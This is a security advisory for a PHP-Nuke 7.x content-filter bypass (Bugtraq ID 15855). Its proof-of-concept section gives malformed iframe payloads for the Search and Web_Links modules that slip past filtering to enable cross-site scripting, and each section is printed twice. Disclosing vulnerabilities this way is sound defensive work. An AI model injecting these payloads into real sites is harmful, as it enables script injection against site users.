PHPNuke Content Filtering Byapss Vulnerability
BID:15855
Info
PHPNuke Content Filtering Byapss Vulnerability
| Bugtraq ID: | 15855 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 14 2005 12:00AM |
| Updated: | Dec 14 2005 12:00AM |
| Credit: | Discovered by Maksymilian Arciemowicz <[email protected]>. |
| Vulnerable: |
Francisco Burzi PHP-Nuke 7.9 Francisco Burzi PHP-Nuke 7.8 Francisco Burzi PHP-Nuke 7.7 Francisco Burzi PHP-Nuke 7.6 Francisco Burzi PHP-Nuke 7.3 Francisco Burzi PHP-Nuke 7.3 Francisco Burzi PHP-Nuke 7.2 Francisco Burzi PHP-Nuke 7.1 Francisco Burzi PHP-Nuke 7.0 |
| Not Vulnerable: | |
Discussion
PHPNuke Content Filtering Byapss Vulnerability
PHPNuke is prone to a content filtering bypass vulnerability. This issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks.
PHPNuke 7.9 and prior versions are reported to be vulnerable.
PHPNuke is prone to a content filtering bypass vulnerability. This issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks.
PHPNuke 7.9 and prior versions are reported to be vulnerable.
Exploit / POC
PHPNuke Content Filtering Byapss Vulnerability
An exploit is not required.
The following proof of concept examples are available:
URI:
http://www.example.com/[DIR]/modules.php?name=Search
Insert:
<iframe src=http://www.example.com?phpnuke79 <
URI:
http://www.example.com/[DIR]//modules.php?name=Web_Links
Insert:
<iframe src=http://www.example.com?phpnuke79 <
An exploit is not required.
The following proof of concept examples are available:
URI:
http://www.example.com/[DIR]/modules.php?name=Search
Insert:
<iframe src=http://www.example.com?phpnuke79 <
URI:
http://www.example.com/[DIR]//modules.php?name=Web_Links
Insert:
<iframe src=http://www.example.com?phpnuke79 <
Solution / Fix
PHPNuke Content Filtering Byapss Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.